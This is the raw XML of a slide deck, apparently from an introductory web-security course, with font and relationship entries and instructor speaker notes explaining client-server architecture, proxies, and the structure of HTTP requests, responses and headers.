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Nunito SemiBold"/>
      <p:regular r:id="rId59"/>
      <p:bold r:id="rId60"/>
      <p:italic r:id="rId61"/>
      <p:boldItalic r:id="rId62"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"/>
      <p:regular r:id="rId63"/>
      <p:bold r:id="rId64"/>
      <p:italic r:id="rId65"/>
      <p:boldItalic r:id="rId66"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Medium"/>
      <p:regular r:id="rId67"/>
      <p:bold r:id="rId68"/>
      <p:italic r:id="rId69"/>
      <p:boldItalic r:id="rId70"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId71"/>
      <p:bold r:id="rId72"/>
      <p:italic r:id="rId73"/>
      <p:boldItalic r:id="rId74"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId75"/>
      <p:bold r:id="rId76"/>
      <p:italic r:id="rId77"/>
      <p:boldItalic r:id="rId78"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Nunito"/>
      <p:regular r:id="rId79"/>
      <p:bold r:id="rId80"/>
      <p:italic r:id="rId81"/>
      <p:boldItalic r:id="rId82"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Light"/>
      <p:regular r:id="rId83"/>
      <p:bold r:id="rId84"/>
      <p:italic r:id="rId85"/>
      <p:boldItalic r:id="rId86"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat Medium"/>
      <p:regular r:id="rId87"/>
      <p:bold r:id="rId88"/>
      <p:italic r:id="rId89"/>
      <p:boldItalic r:id="rId90"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>
      <p:regular r:id="rId91"/>
      <p:bold r:id="rId92"/>
      <p:italic r:id="rId93"/>
      <p:boldItalic r:id="rId94"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono"/>
      <p:regular r:id="rId95"/>
      <p:bold r:id="rId96"/>
      <p:italic r:id="rId97"/>
      <p:boldItalic r:id="rId98"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Comfortaa"/>
      <p:regular r:id="rId99"/>
      <p:bold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84E4C29-16A3-4B96-AD44-0125373979AF}">
  <a:tblStyle styleId="{584E4C29-16A3-4B96-AD44-0125373979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BE036B0-01B0-44B2-8A13-DDC58F844C1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9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Comfortaa-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regular.fntdata"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-boldItalic.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5.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Comfortaa-regular.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId98"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Light-regular.fntdata"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/MontserratMedium-boldItalic.fntdata"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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MonoLight-bold.fntdata"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoLight-regular.fntdata"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoLight-boldItalic.fntdata"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoLight-italic.fntdata"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/MontserratMedium-bold.fntdata"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/MontserratMedium-regular.fntdata"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/MontserratMedium-italic.fntdata"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Nunito-bold.fntdata"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Nunito-boldItalic.fntdata"/><Relationship Id="rId81"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italic.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-regular.fntdata"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-italic.fntdata"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-bold.fntdata"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Nunito-regular.fntdata"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-boldItalic.fntdata"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NunitoSemiBold-boldItalic.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NunitoSemiBold-italic.fntdata"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-bold.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-bold.fntdata"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-regular.fntdata"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NunitoSemiBold-bold.fntdata"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-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font" Target="fonts/NunitoSemiBold-regular.fntdata"/><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re.company.com/dir/page.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street.com/story/14431727/1/uber-s-rough-road-leads-to-softbank-deal.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569ec14bf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69ec14bf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69ec14bf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69ec14bf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Explain that client-server architecture allows </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>clients</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> to use resources without having to know where they are.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If a client realizes it needs a resource, it simply requests it from a server.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turn, the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>server’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> job is to know where resources live, and be able to provide them when requested.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Often, these resources live on the server’s filesystem, or in a database elsewhere on the Internet.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Either way, the server knows how to get the resource, and will send it to whomever asks.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Proxy Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> are devices that “intercept” client requests.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Proxies play multiple roles.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 proxy can be placed outside of a LAN, in order to throttle the amount of requests that the LAN sends to the Internet (to reduce bandwidth usage)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Attackers can use proxies to steal data inside of requests (as in a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Man in the Middle Attack</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Pentesters can use proxies to inspect and change requests/responses as they send/receive them (as with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Burp Suite</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569ec14bf4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569ec14bf4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569ec14bf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569ec14bf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569ec14bf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569ec14bf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Remind students that HTTP is an OSI Layer 7, or Application Layer, protocol.</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HTTP is used to transfer web pages; static assets, such as images and HTML/markup files; and raw data, such as MP4 video or MP3 audio.</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569ec14bf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569ec14bf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569ec14bf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569ec14bf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Review that HTTP requests comprise up to four main components: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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>request line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, which contains the HTTP verb; the path to the file on the server receiving the request; and the version of the HTTP protocol in use, which may be 1.0, 1.1, or 2.0.</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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, which are additional pieces of information the server can use to fulfill a request.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 line of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>whitespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, which actually is an important part of a request, as it indicates the end of the header section.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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>request body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, which contains data we send to the server. This is unique to POST requests, so the slide doesn’t contain this section.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the HTTP verb indicates what action the client wants the server to take.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there are several HTTP verbs, but that we’ll concern ourselves primarily with the following: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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> requests, which indicate that the client is requesting the server to provide a resource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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> requests, which indicate that the client wants the server to save data that we’re sending it.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Emphasize that there are too many headers to know off the top of one’s head, so students shouldn’t expect to have to remember them all.</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we’ll see the most common headers as we continue to explore requests and responses in more detail, and that we’ll provide links to reference documentation which students can use to conduct their own research later.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69ec14bf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69ec14bf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GET requests can also send data with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>query parameters</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query parameters appear in the name of the request resources.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Point out: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path to the request field is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>/articles</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After the path, there is a question mark: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> followed by: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>tag=latest&amp;author=jane</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This sends the server two parameters/pieces of data, called </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>author</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, with the values </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>latest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, respectively.</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server will probably use these to look up the latest articles by the author Jane.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Emphasize the syntax for query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>parameters</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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>?firstParam=value&amp;secondParam=value</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There is no limit on the number of query params a user can send via GET requests.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569ec14bf4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569ec14bf4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Explain that the structure of an HTTP POST request is similar, but includes a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>request body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> below the whitespace.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Point out that POST requests also always include </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Content-Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> headers, indicating the size of the data the server should expect, and the type.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g569ec14bf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569ec14bf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Review that responses comprise four main components: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>status line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, containing the version of HTTP in use; a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>status code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, which is a number between 1xx and 5xx indicating whether the server was successful in fulfilling the request; and a textual representation of the status code.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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, which influence the way that clients interpret the request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 line of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>whitespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> to separate the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>response header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> from the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>response message body</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>response message body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, or simply </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>response body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, which contains the data that the client requested.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servers use response headers for many important tasks, including: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Setting </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, which are values the client stores and sends back to the server on subsequent requests, so the server can use them to track information about the client (such as login status, the items in their cart, etc.)</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Coordinating with the client about the type of data the response contains, and how it’s encoded. E.g., servers often compress data with gzip before sending it to the client, and use the Content-Encoding header to provide a “heads up” as to how to decompress the data upon receipt.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rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Share information about the server and operating system in use, as evidenced by the Server and X-Powered-By headers. This is common practice, but it’s best </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
